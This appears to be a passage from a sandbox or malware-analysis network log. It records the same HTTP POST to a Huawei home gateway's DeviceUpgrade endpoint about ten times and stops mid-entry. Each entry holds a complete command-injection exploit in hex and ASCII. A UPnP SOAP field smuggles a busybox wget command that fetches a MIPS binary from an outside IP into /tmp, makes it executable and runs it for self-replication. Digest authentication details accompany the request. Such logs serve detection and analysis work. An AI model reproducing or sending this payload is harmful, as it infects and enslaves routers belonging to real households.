                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 